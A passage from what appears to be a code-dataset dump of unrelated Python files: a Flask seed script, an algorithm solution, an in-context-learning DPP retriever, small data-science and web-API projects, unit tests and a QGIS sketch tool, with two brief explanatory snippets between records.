Add a pop of color and shine to your lips with this Pink Delight shade.\", price=120, category=1,quantity=70, brand=3)\n product_6 = Product(image=\"https://images.pexels.com/photos/5849420/pexels-photo-5849420.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"MAC Blush Brush\", description=\"Sculpt and define your cheeks with this MAC blush brush. Soft and angled bristles make application easy and precise.\", price=50, category=4,quantity=390 , brand=4)\n product_7 = Product(image=\"https://images.pexels.com/photos/7797740/pexels-photo-7797740.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Maybelline Lipstick - Coral Crush\", description=\"Vibrant coral lipstick by Maybelline. Provides a creamy texture and bold color payoff.\", price=180, category=1, quantity=100 , brand=3)\n product_8 = Product(image=\"https://images.pexels.com/photos/6476122/pexels-photo-6476122.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"MAC Foundation - Natural Glow\", description=\"Lightweight foundation for a natural glow. Blends seamlessly and provides all-day coverage.\", price=280, category=2,quantity=94, brand=4)\n product_9 = Product(image=\"https://images.pexels.com/photos/3997378/pexels-photo-3997378.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Rihanna Face Cream - Hydrating Moisture\", description=\"Hydrating face cream by Rihanna. Infused with moisturizing ingredients for soft and supple skin.\", price=220, category=2,quantity=60, brand=2)\n product_10 = Product(image=\"https://images.pexels.com/photos/5871834/pexels-photo-5871834.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"MAC Concealer - Full Coverage\", description=\"Full coverage concealer by MAC. Conceals imperfections and brightens the under-eye area.\", price=150, category=2, quantity=20, brand=4)\n product_11 = Product(image=\"https://images.pexels.com/photos/3115708/pexels-photo-3115708.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Maybelline Eyeshadow Palette - Bold Hues\", description=\"Dive into a world of bold hues with this Maybelline eyeshadow palette. Create vibrant and daring eye looks with a mix of matte and shimmer shades.\", price=280, category=3,quantity=150, brand=3)\n product_12 = Product(image=\"https://images.pexels.com/photos/279480/pexels-photo-279480.jpeg?auto=compress&cs=tinysrgb&w=1600\", p_name=\"Huddah Makeup Brush Set\", description=\"High-quality makeup brush set by Huddah Cosmetics. 
Includes brushes for eyes, face, and lips.\", price=200, category=4, quantity=120, brand=1)\n\n # Add products to the session and commit\n db.session.add_all([\n product_1, product_2, product_3, product_4, product_5, product_6, product_7, product_8, product_9, product_10, product_11, product_12\n ])\n db.session.commit()\n\n print(\"🦸♀️ Seeding Invoices with Faker...\")\n for _ in range(50): # Generate 50 fake invoices, each tied to the first user and product\n user = User.query.order_by(User.id).first()\n product = Product.query.order_by(Product.id).first()\n invoice = Invoice(\n users=user,\n products=product,\n quantity=fake.random_int(min=1, max=20),\n cost=fake.random_int(min=10, max=5000)\n )\n db.session.add(invoice)\n\n print(\"🦸♀️ Seeding Invoice_Products with Faker...\")\n products = Product.query.all()\n invoices = Invoice.query.all()\n for _ in range(50): # Generate 50 fake invoice products\n product = fake.random_element(products)\n invoice = fake.random_element(invoices)\n invoice_product = InvoiceProducts(\n product_rl=product,\n invoice_rl=invoice\n )\n db.session.add(invoice_product)\n\n db.session.commit()\n\nif __name__ == \"__main__\":\n with app.app_context():\n db.app = app # Bind the app to the current SQLAlchemy instance\n delete_data()\n db.session.commit()\n seed_data()\n db.session.commit()\n\n print(\"🦸♀️ Done seeding!\")\n","repo_name":"Bii-teki/bloom-beauty-backend","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":7966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
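Since everything above is Faker-generated, runs are non-deterministic; if reproducible seed data is wanted, Faker and random can both be seeded first (a sketch, using the same modules as above):

```python
from faker import Faker
import random

Faker.seed(42)   # class-level seed shared by all Faker instances
random.seed(42)
fake = Faker()
print(fake.first_name())  # same value on every run
```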
+{"seq_id":"19547927799","text":"def solution(n, wires):\n answer = n\n for wire in wires:\n tmp = wires[:]\n tmp.remove(wire)\n num = count_num(tmp, wire[0]) + 1\n if answer > abs(n - 2 * num):\n answer = abs(n - 2 * num)\n return answer\n\ndef count_num(arr, num):\n tmp = []\n left = []\n answer = 0\n for i in arr:\n if i[0] == num:\n left.append(i[1])\n elif i[1] == num:\n left.append(i[0])\n else:\n tmp.append(i)\n if left == []:\n return 0\n else:\n for j in left:\n answer += count_num(tmp, j)\n return answer + len(left)\n","repo_name":"MinHoon-LEE/Ps_Sql","sub_path":"Programmers/Algorithm/Python/86971/86971.py","file_name":"86971.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"35319890071","text":"\"\"\"DPP Retriever\"\"\"\n\nfrom openicl import DatasetReader\nfrom openicl.icl_retriever.icl_topk_retriever import TopkRetriever\nfrom openicl.utils.logging import get_logger\nfrom typing import Optional\nimport tqdm\nimport numpy as np\nimport math\nfrom accelerate import Accelerator\n\nlogger = get_logger(__name__)\n\n\nclass DPPRetriever(TopkRetriever):\n \"\"\"DPP In-context Learning Retriever Class\n Class of DPP Retriever.\n Two-stage DPP is used, where first stage is to get results of TopK to reduce candidate sets\n chechout https://arxiv.org/abs/2302.05698 for details.\n \n Attributes:\n dataset_reader (:obj:`DatasetReader`): An instance of the :obj:`DatasetReader` class.\n ice_separator (:obj:`str`, optional): A string that separates each in-context example.\n ice_eos_token (:obj:`str`, optional): A string that is added to the end of in-context examples.\n prompt_eos_token (:obj:`str`, optional): A string that is added to the end of the prompt.\n ice_num (:obj:`int`, optional): The number of data in the in-context examples.\n index_split (:obj:`str`, optional): A string for the index dataset name. The index dataset is used to select data for in-context examples. Defaults to ``train``.\n test_split (:obj:`str`, optional): A string for the generation dataset name. The test dataset is used to generate prompts for each data. Defaults to ``test``.\n index_ds (:obj:`Dataset`): The index dataset. Used to select data for in-context examples.\n test_ds (:obj:`Dataset`): The test dataset. Used to generate prompts for each data.\n accelerator (:obj:`Accelerator`, optional): An instance of the :obj:`Accelerator` class, used for multiprocessing.\n batch_size (:obj:`int`, optional): Batch size for the :obj:`DataLoader`. \n model (:obj:`SentenceTransformer`): An instance of :obj:`SentenceTransformer` class, used to calculate embeddings.\n tokenizer (:obj:`AutoTokenizer`): Tokenizer for :obj:`model`.\n index (:obj:`IndexIDMap`): Index generated with FAISS.\n seed (:obj:`int`, optional): Seed for the random number generator. 
(:obj:`random_state` in :obj:`sample_exact_k_dpp` method)\n scale_factor (:obj:`float`, optional): A factor when gets the kernel.\n \"\"\"\n model = None\n\n def __init__(self,\n dataset_reader: DatasetReader,\n ice_separator: Optional[str] = '\\n',\n ice_eos_token: Optional[str] = '\\n',\n prompt_eos_token: Optional[str] = '',\n sentence_transformers_model_name: Optional[str] = 'all-mpnet-base-v2',\n ice_num: Optional[int] = 1,\n candidate_num: Optional[int] = 1,\n index_split: Optional[str] = 'train',\n test_split: Optional[str] = 'test',\n tokenizer_name: Optional[str] = 'gpt2-xl',\n batch_size: Optional[int] = 1,\n accelerator: Optional[Accelerator] = None,\n seed: Optional[int] = 1,\n scale_factor: Optional[float] = 0.1\n ) -> None:\n super().__init__(dataset_reader, ice_separator, ice_eos_token, prompt_eos_token,\n sentence_transformers_model_name, ice_num, index_split, test_split, tokenizer_name, batch_size,\n accelerator)\n self.candidate_num = candidate_num\n self.seed = seed\n self.scale_factor = scale_factor\n\n def dpp_search(self):\n res_list = self.forward(self.dataloader, process_bar=True, information=\"Embedding test set...\")\n rtr_idx_list = [[] for _ in range(len(res_list))]\n logger.info(\"Retrieving data for test set...\")\n for entry in tqdm.tqdm(res_list, disable=not self.is_main_process):\n idx = entry['metadata']['id']\n\n # get TopK results\n embed = np.expand_dims(entry['embed'], axis=0)\n near_ids = np.array(self.index.search(embed, self.candidate_num)[1][0].tolist())\n\n # DPP stage\n near_reps, rel_scores, kernel_matrix = self.get_kernel(embed, near_ids.tolist())\n\n # MAP inference\n samples_ids = fast_map_dpp(kernel_matrix, self.ice_num)\n\n # ordered by relevance score\n samples_scores = np.array([rel_scores[i] for i in samples_ids])\n samples_ids = samples_ids[(-samples_scores).argsort()].tolist()\n rtr_sub_list = [int(near_ids[i]) for i in samples_ids]\n\n rtr_idx_list[idx] = rtr_sub_list\n\n return rtr_idx_list\n\n def retrieve(self):\n return self.dpp_search()\n\n def get_kernel(self, embed, candidates):\n near_reps = np.stack([self.index.index.reconstruct(i) for i in candidates], axis=0)\n # normalize first\n embed = embed / np.linalg.norm(embed)\n near_reps = near_reps / np.linalg.norm(near_reps, keepdims=True, axis=1)\n\n # to make kernel-matrix non-negative\n rel_scores = np.matmul(embed, near_reps.T)[0]\n rel_scores = (rel_scores + 1) / 2\n\n # to prevent overflow error\n rel_scores -= rel_scores.max()\n\n # to balance relevance and diversity\n rel_scores = np.exp(rel_scores / (2 * self.scale_factor))\n\n # to make kernel-matrix non-negative\n sim_matrix = np.matmul(near_reps, near_reps.T)\n sim_matrix = (sim_matrix + 1) / 2\n\n kernel_matrix = rel_scores[None] * sim_matrix * rel_scores[:, None]\n return near_reps, rel_scores, kernel_matrix\n\n\ndef fast_map_dpp(kernel_matrix, max_length):\n \"\"\"\n fast implementation of the greedy algorithm\n reference: https://github.com/laming-chen/fast-map-dpp/blob/master/dpp_test.py\n paper: Fast Greedy MAP Inference for Determinantal Point Process to Improve Recommendation Diversity\n \"\"\"\n item_size = kernel_matrix.shape[0]\n cis = np.zeros((max_length, item_size))\n di2s = np.copy(np.diag(kernel_matrix))\n selected_items = list()\n selected_item = np.argmax(di2s)\n selected_items.append(int(selected_item))\n while len(selected_items) < max_length:\n k = len(selected_items) - 1\n ci_optimal = cis[:k, selected_item]\n di_optimal = math.sqrt(di2s[selected_item])\n elements = kernel_matrix[selected_item, 
:]\n eis = (elements - np.dot(ci_optimal, cis[:k, :])) / di_optimal\n cis[k, :] = eis\n di2s -= np.square(eis)\n selected_item = np.argmax(di2s)\n selected_items.append(int(selected_item))\n return selected_items\n","repo_name":"Shark-NLP/OpenICL","sub_path":"openicl/icl_retriever/icl_dpp_retriever.py","file_name":"icl_dpp_retriever.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"7"}
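The greedy MAP step can be exercised on its own; a toy-kernel demo that mirrors `get_kernel`'s structure (sizes and values here are illustrative, not from the paper):

```python
# Build a small non-negative kernel from random unit vectors, then pick a
# diverse subset with the greedy MAP routine defined above.
import numpy as np

rng = np.random.default_rng(0)
reps = rng.normal(size=(8, 16))
reps /= np.linalg.norm(reps, axis=1, keepdims=True)

sim = (reps @ reps.T + 1) / 2      # shift to keep the matrix non-negative
rel = np.ones(8)                   # uniform relevance, just for the demo
kernel = rel[None] * sim * rel[:, None]

print(fast_map_dpp(kernel, 3))     # indices of 3 mutually diverse items
```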
+{"seq_id":"60682937","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport pickle\n\ndf = pd.read_csv('dataset/imdb.txt', names=['sentence', 'label'], sep='\\t')\nsentences=df.sentence\ny = df.label\nsentences_train, sentences_test, y_train, y_test = train_test_split(sentences, y, test_size=0.25, random_state=1000)\nvectorizer = CountVectorizer()\nvectorizer.fit(sentences_train)\nX_train = vectorizer.transform(sentences_train)\nX_test = vectorizer.transform(sentences_test)\nmodel = LogisticRegression()\nmodel.fit(X_train, y_train)\nscore = model.score(X_test, y_test)\nprint(\"Accuracy:{}\".format(score) )\n\n#save model\npickle.dump(vectorizer, open('vectorizer','wb'))\npickle.dump(model, open('model', 'wb'))\n\n#predict sample\nsample=[\"Movie was awesome\",\"Movie was bad\"]\ntest=vectorizer.transform(sample)\nres=model.predict(test)\nfor i in res:\n if(abs(i)>abs(1-i)):\n print(\"pos\")\n else:\n print(\"neg\")\n","repo_name":"AMAN2202/Movie_Review_Classification_using_Neural_Network_and_API","sub_path":"nlp/modelling/nlp/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"16786408822","text":"import numpy as np\n\nmaxID = 0\nids = np.arange(1033)\nseats = []\nwith open(\"data.txt\", \"r\") as file:\n for line in file.read().split(\"\\n\"):\n seat = sum([int(i) * 2 ** j for j, i in enumerate(line.replace(\"L\", \"0\").replace(\"R\", \"1\").replace(\"F\", \"0\").replace(\"B\", \"1\")[::-1])])\n seats.append(seat)\n if seat > maxID:\n maxID = seat\nprint(maxID)\nfree = np.asarray([i for i in ids if i not in seats])\nyour = free[np.where(np.gradient(free) != 1)[0][1]]\nprint(your)","repo_name":"Haakooto/AdventOfCode","sub_path":"2020/05/binary_boarding.py","file_name":"binary_boarding.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"32961591276","text":"# Dependencies\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n# Set up database engine\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# Reflect database into classes\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n# Create a variable for each class\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create session link from Python to database\nsession = Session(engine)\n\n# Define flask app\napp = Flask(__name__)\n\n# Define welcome route\n@app.route(\"/\")\n\n# Create function for routing information\ndef welcome():\n return(\n '''\n Welcome to the Climate Analysis API!\n Available Routes:\n /api/v1.0/precipitation\n /api/v1.0/stations\n /api/v1.0/tobs\n /api/v1.0/temp/start/end\n ''')\n\n# Define precipitation route\n@app.route(\"/api/v1.0/precipitation\")\n\n# Create precipitation function\ndef precipitation():\n # Calculate date one year ago from date in database\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # Query for date/precipitation for previous year\n precipitation = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n # Use jsonify() to romat results into JSON structured file (dictionary)\n precip = {date: prcp for date, prcp in precipitation}\n return jsonify(precip)\n\n# Define station route\n@app.route(\"/api/v1.0/stations\")\n\n# Create station function\ndef stations():\n # Collect all stations\n results = session.query(Station.station).all()\n # Unravel results into one-dimensional array, then a list, then jsonify\n stations = list(np.ravel(results))\n return jsonify(stations=stations)\n\n# Define temperature route\n@app.route(\"/api/v1.0/tobs\")\n\n# Create temp function\ndef temp_monthly():\n # Calculate date one year ago from date in database\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # Query primary station for all temps from previous year\n results = session.query(Measurement.tobs).filter(Measurement.station == 'USC00519281').filter(Measurement.date >= prev_year).all()\n # Unravel results into one-dimensional array, then a list\n temps = list(np.ravel(results))\n # jsonify results\n return jsonify(temps=temps)\n\n# Define status route\n@app.route(\"/api.v1.0/temp/\")\n@app.route(\"/api.v1.0/temp//\")\n\n# Create stats function including start and end parameters\ndef stats(start=None, end=None):\n sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n if not end:\n results = session.query(*sel).\\\n filter(Measurement.date >= start).all()\n temps = list(np.ravel(results))\n return jsonify(temps)\n\n results = session.query(*sel).\\\n filter(Measurement.date >= start).\\\n filter(Measurement.date <= end).all()\n temps = list(np.ravel(results))\n return jsonify(temps)","repo_name":"HollyC13/surfs_up","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"28482076905","text":"import os\nimport zipfile\nfrom pathlib import Path\nfrom unittest import TestCase\nfrom unittest.mock import patch, MagicMock\n\nfrom drover.io import ArchiveMapping, get_digest, get_relative_file_names, write_archive\n\n\nclass TestGetDigest(TestCase):\n def test_zero_file_digest_is_none(self):\n assert get_digest(tuple()) is None\n\n\nclass TestGetRelativeFileNames(TestCase):\n def test_without_excludes(self):\n expected_source_path = '/'\n expected_relative_file_names = set((\n Path('file_0'),\n Path('path_a/file_a_0'),\n Path('path_a/file_a_1'),\n Path('path_b/file_b_0')))\n expected_walk = (\n ('/', ('path_a', 'path_b',), ('file_0',)),\n ('/path_a', (), ('file_a_0', 'file_a_1')),\n ('/path_b', (), ('file_b_0',)),\n )\n with patch.object(os, 'walk', return_value=expected_walk) as mock_walk:\n names = set(get_relative_file_names(expected_source_path))\n mock_walk.assert_called_once_with(str(expected_source_path))\n assert names == expected_relative_file_names\n\n\nclass TestWriteArchive(TestCase):\n def test_write_empty_archive(self):\n expected_archive_file_name = Path('archive.zip')\n mock_zip_file = MagicMock(spec=zipfile.ZipFile)\n with patch.object(zipfile, 'ZipFile') as mock_zip_file_cls:\n mock_zip_file_cls.return_value.__enter__.return_value = mock_zip_file\n write_archive(expected_archive_file_name, [])\n mock_zip_file_cls.assert_called_once_with(\n expected_archive_file_name, 'w',\n compression=zipfile.ZIP_DEFLATED,\n compresslevel=9)\n mock_zip_file.write.assert_not_called()\n\n def test_write_non_empty_archive(self):\n expected_archive_file_name = Path('archive.zip')\n expected_archive_mappings = [\n ArchiveMapping(source_file_name=Path('source/a'), archive_file_name=Path('archive/a')),\n ArchiveMapping(source_file_name=Path('source/b'), archive_file_name=Path('archive/b')),\n ]\n mock_zip_file = MagicMock(spec=zipfile.ZipFile)\n with patch.object(zipfile, 'ZipFile') as mock_zip_file_cls:\n mock_zip_file_cls.return_value.__enter__.return_value = mock_zip_file\n write_archive(expected_archive_file_name, expected_archive_mappings)\n mock_zip_file_cls.assert_called_once_with(\n expected_archive_file_name, 'w',\n compression=zipfile.ZIP_DEFLATED,\n compresslevel=9)\n for expected_archive_mapping in expected_archive_mappings:\n mock_zip_file.write.assert_any_call(\n filename=expected_archive_mapping.source_file_name,\n arcname=expected_archive_mapping.archive_file_name)\n","repo_name":"jwilges/drover","sub_path":"tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
+{"seq_id":"43661620568","text":"import os\n\nfrom corcym.settings import PATH_P\n\npath = PATH_P\nfiles = os.listdir(path)\n\nif files:\n for f in files:\n rm_path = PATH_P + f\"{f}\"\n os.remove(rm_path)\n","repo_name":"talhaumer/corcym","sub_path":"seeding-scripts/removefiles.py","file_name":"removefiles.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24129543870","text":"import re\nimport unicodedata\n\n\ndef _format_size(value, digits, unit):\n if digits > 0:\n return \"{{:.{}f}}{}\".format(digits, unit).format(value)\n else:\n return \"{{:d}}{}\".format(unit).format(value)\n\n\ndef format_size(bytes_, digits=1):\n if bytes_ < 1024:\n return _format_size(bytes_, digits, \"B\")\n\n kilo = bytes_ / 1024\n if kilo < 1024:\n return _format_size(kilo, digits, \"kB\")\n\n mega = kilo / 1024\n if mega < 1024:\n return _format_size(mega, digits, \"MB\")\n\n return _format_size(mega / 1024, digits, \"GB\")\n\n\ndef format_duration(total_seconds):\n total_seconds = int(total_seconds)\n hours = total_seconds // 3600\n remainder = total_seconds % 3600\n minutes = remainder // 60\n seconds = total_seconds % 60\n\n if hours:\n return \"{} h {} min\".format(hours, minutes)\n\n if minutes:\n return \"{} min {} sec\".format(minutes, seconds)\n\n return \"{} sec\".format(seconds)\n\n\ndef read_int(msg, min, max, default):\n msg = msg + \" [default {}]: \".format(default)\n\n while True:\n try:\n val = input(msg)\n if not val:\n return default\n if min <= int(val) <= max:\n return int(val)\n except ValueError:\n pass\n\n\ndef slugify(value):\n re_pattern = re.compile(r'[^\\w\\s-]', flags=re.U)\n re_spaces = re.compile(r'[-\\s]+', flags=re.U)\n value = str(value)\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')\n value = re_pattern.sub('', value).strip().lower()\n return re_spaces.sub('-', value)\n","repo_name":"GaspardIV/twitchautocut","sub_path":"twitchdl/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"21356390645","text":"from django import template\nfrom django.template.defaulttags import register\nfrom todo.models import Task\n\n\nclass TaskPriorityNode(template.Node):\n def __init__(self, priority_level):\n self.priority_level = template.Variable(priority_level)\n\n def render(self, context):\n try:\n priority_level_value = self.priority_level.resolve(context)\n\n return \"\".format(Task.priority_label(priority_level_value))\n except template.VariableDoesNotExist:\n return ''\n\n@register.tag(name=\"task_priority\")\ndef do_task_priority(parser, token):\n try:\n tag_name, priority_level = token.split_contents()\n except ValueError:\n raise template.TemplateSyntaxError(\n \"%r tag requires a single argument\" % token.contents.split()[0]\n )\n\n return TaskPriorityNode(priority_level)","repo_name":"dwolosowicz/django-todo-app","sub_path":"project/todo/templatetags/task_priority.py","file_name":"task_priority.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1797467836","text":"import qgis, qgis.utils, os, datetime, PIL, platform\n\nif platform.system() == \"Windows\":\n from PIL import ImageGrab\nfrom PIL.ImageQt import ImageQt\n\nfrom qgis.PyQt import uic, QtCore, QtGui\nfrom qgis.PyQt.QtWidgets import QWidget, QMainWindow, QSpinBox, QAction, QDialog, QFrame\n\nfrom Lamia.qgisiface.iface.qgiswidget.tools.lamia_abstractformtool import (\n AbstractLamiaFormTool,\n)\nfrom .lamia_form_pictureviewer import PictureViewer\n\nbase3 = QtCore.QObject()\n\n\nclass BaseSketchTool(AbstractLamiaFormTool):\n\n PREPROTOOLNAME = \"sketch\"\n DBASETABLENAME = \"media\"\n LOADFIRST = False\n\n tooltreewidgetCAT = QtCore.QCoreApplication.translate(\"base3\", \"Resources\")\n tooltreewidgetSUBCAT = QtCore.QCoreApplication.translate(\"base3\", \"Sketches\")\n\n tooltreewidgetICONPATH = os.path.join(\n os.path.dirname(__file__), \"lamia_form_sketch_icon.png\"\n )\n\n tempparentjoin = {}\n linkdict = {\n \"colparent\": \"id_object\",\n \"colthistable\": \"id_resource\",\n \"tctable\": \"tcobjectresource\",\n \"tctablecolparent\": \"lid_object\",\n \"tctablecolthistable\": \"lid_resource\",\n }\n for tablename in [\n \"deficiency\",\n \"observation\",\n \"node\",\n \"edge\",\n \"surface\",\n \"equipment\",\n \"facility\",\n ]:\n tempparentjoin[tablename] = linkdict\n PARENTJOIN = tempparentjoin\n\n TABLEFILTERFIELD = {\"typemedia\": \"CRO\"}\n GEOMETRYSKIP = True\n\n def __init__(self, **kwargs):\n super(BaseSketchTool, self).__init__(**kwargs)\n\n def initMainToolWidget(self):\n # ****************************************************************************************\n # userui\n self.toolwidgetmain = UserUI()\n self.formtoolwidgetconfdictmain = {\n \"media\": {\"linkfield\": \"id_media\", \"widgets\": {}},\n \"object\": {\"linkfield\": \"id_object\", \"widgets\": {}},\n \"resource\": {\"linkfield\": \"id_ressource\", \"widgets\": {}},\n }\n\n # self.groupBox_geom.setParent(None)\n # self.frame_editing.setVisible(False)\n self.toolwidgetmain.stackedWidget.setCurrentIndex(1)\n\n self.toolwidgetmain.pushButton_open.clicked.connect(self.openFile)\n self.toolwidgetmain.pushButton_edit.clicked.connect(self.editPhoto)\n self.toolwidgetmain.pushButton_getfromclipboard.clicked.connect(self.pasteImage)\n self.editorwindow = ScribbleMainWindow(parentwdg=self)\n self.photowdg = PictureViewer()\n self.toolwidgetmain.frame_cr.layout().addWidget(self.photowdg)\n\n def postSelectFeature(self):\n\n if self.currentFeaturePK is None: # first time\n datecreation = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n self.formutils.applyResultDict(\n {\"resource\": {\"datetimeresource\": datecreation}}\n )\n self.editorwindow.reinitSize()\n self.editorwindow.clear()\n self.photowdg.clear()\n\n else:\n sql = \"SELECT file FROM media_qgis WHERE pk_media = \" + str(\n self.currentFeaturePK\n )\n file = self.dbase.query(sql)[0][0]\n if (\n file is not None\n and file != \"\"\n and os.path.isfile(self.dbase.completePathOfFile(file))\n ):\n self.editorwindow.openImage(self.dbase.completePathOfFile(file))\n self.formutils.showImageinLabelWidget(\n self.photowdg, self.dbase.completePathOfFile(file)\n )\n else:\n self.editorwindow.clear()\n self.photowdg.clear()\n\n def pasteImage(self):\n if platform.system() == \"Windows\":\n pilimage = PIL.ImageGrab.grabclipboard()\n if pilimage is not None:\n im = ImageQt(pilimage)\n self.editorwindow.setImage(im)\n self.photowdg.clear()\n self.photowdg.setPixmap(im)\n self.editPhoto()\n\n def editPhoto(self):\n if qgis.utils.iface 
is not None:\n self.editorwindow.show()\n else:\n self.editorwindow.setWindowModality(QtCore.Qt.ApplicationModal)\n self.editorwindow.show()\n\n def openFile(self):\n if self.currentFeaturePK is not None:\n sql = \"SELECT file FROM media_qgis WHERE pk_media = \" + str(\n self.currentFeaturePK\n )\n query = self.dbase.query(sql)\n # result = [row[0] for row in query]\n resultfile = query[0][0]\n if os.path.isfile(self.dbase.completePathOfFile(resultfile)):\n filepath = self.dbase.completePathOfFile(resultfile)\n os.startfile(filepath)\n\n \"\"\"\n def createParentFeature(self):\n pkobjet = self.dbase.createNewObjet()\n\n if False:\n # lastrevision = self.dbase.maxrevision\n datetimecreation = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n lastobjetid = self.dbase.getLastId('Objet') + 1\n sql = \"INSERT INTO Objet (id_objet, lpk_revision_begin, datetimecreation ) \"\n sql += \"VALUES(\" + str(lastobjetid ) + \",\" + str(self.dbase.maxrevision) + \",'\" + datetimecreation + \"');\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n pkobjet = self.dbase.getLastRowId('Objet')\n\n lastressourceid = self.dbase.getLastId('Ressource') + 1\n sql = \"INSERT INTO Ressource (id_ressource, lpk_objet) \"\n sql += \"VALUES(\" + str(lastressourceid) + \",\" + str(pkobjet) + \");\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n pkres = self.dbase.getLastRowId('Ressource')\n\n\n\n\n\n pkphoto = self.currentFeaturePK\n lastidphoto = self.dbase.getLastId('Photo') + 1\n datecreation = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n datetimecreation = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n\n fileimage = os.path.join('.', self.dbasetablename, ''.join(datecreation.split('-')),\n str(lastidphoto) + '_croquis.png')\n if not os.path.exists(os.path.dirname(self.dbase.completePathOfFile(fileimage))):\n os.makedirs(os.path.dirname(self.dbase.completePathOfFile(fileimage)))\n self.editorwindow.saveImage(self.dbase.completePathOfFile(fileimage))\n\n\n sql = \"UPDATE Photo SET id_photo = \" + str(lastidphoto) + \",\"\n sql += \"lpk_ressource = \" + str(pkres)\n sql += \", typephoto = 'CRO' \"\n sql += \" WHERE pk_photo = \" + str(pkphoto) + \";\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n\n sql = \"UPDATE Ressource SET file = '\" + fileimage + \"', datetimeressource = '\" + datetimecreation + \"'\"\n sql += \" WHERE pk_ressource = \" + str(pkres) + \";\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n if self.parentWidget is not None and self.parentWidget.currentFeature is not None:\n # self.linkagespec = {'Tcobjetressource'\n if 'Tcobjetressource' in self.linkagespec.keys():\n #get parent id_objet\n sql = \" SELECT id_objet FROM \" + self.parentWidget.dbasetablename.lower() + \"_qgis\"\n sql += \" WHERE pk_\" + self.parentWidget.dbasetablename.lower() + \" = \" + str(self.parentWidget.currentFeaturePK)\n currentparentlinkfield = self.dbase.query(sql)[0][0]\n\n #currentparentlinkfield = self.parentWidget.currentFeature['id_objet']\n sql = \"INSERT INTO Tcobjetressource(lpk_revision_begin, lid_objet, lid_ressource) \"\n sql += \" VALUES(\" + str(self.dbase.maxrevision) + \",\" + str(currentparentlinkfield) + ',' + str(lastressourceid) + \")\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n\n if False:\n #lastrevision = self.dbase.getLastPk('Revision')\n lastrevision = self.dbase.maxrevision\n datecreation = QtCore.QDate.fromString(str(datetime.date.today()), 'yyyy-MM-dd').toString('yyyy-MM-dd')\n lastobjetid = 
self.dbase.getLastId('Objet') + 1\n sql = \"INSERT INTO Objet (id_objet, id_revisionbegin, datecreation ) \"\n sql += \"VALUES(\" + str(lastobjetid ) + \",\" + str(lastrevision) + \",'\" + datecreation + \"');\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n #idobjet = self.dbase.getLastRowId('Objet')\n\n\n lastressourceid = self.dbase.getLastId('Ressource') + 1\n sql = \"INSERT INTO Ressource (id_ressource, id_revisionbegin, id_objet) \"\n sql += \"VALUES(\" + str(lastressourceid) + \",\" + str(lastrevision) + \",\" + str(lastobjetid) + \");\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n lastressourcepk = self.dbase.getLastRowId('Ressource')\n\n\n pkcroquis = self.currentFeature.id()\n lastidcroquis = self.dbase.getLastId('Photo') + 1\n\n fileimage = os.path.join('.', self.dbasetablename, ''.join(datecreation.split('-')),\n str(lastidcroquis) + '_croquis.png')\n if not os.path.exists(os.path.dirname(self.dbase.completePathOfFile(fileimage))):\n os.makedirs(os.path.dirname(self.dbase.completePathOfFile(fileimage)))\n self.editorwindow.saveImage(self.dbase.completePathOfFile(fileimage))\n\n\n\n sql = \"UPDATE Photo SET id_objet = \" + str(lastobjetid) + \",\"\n sql += \"id_ressource = \" + str(lastressourceid) + 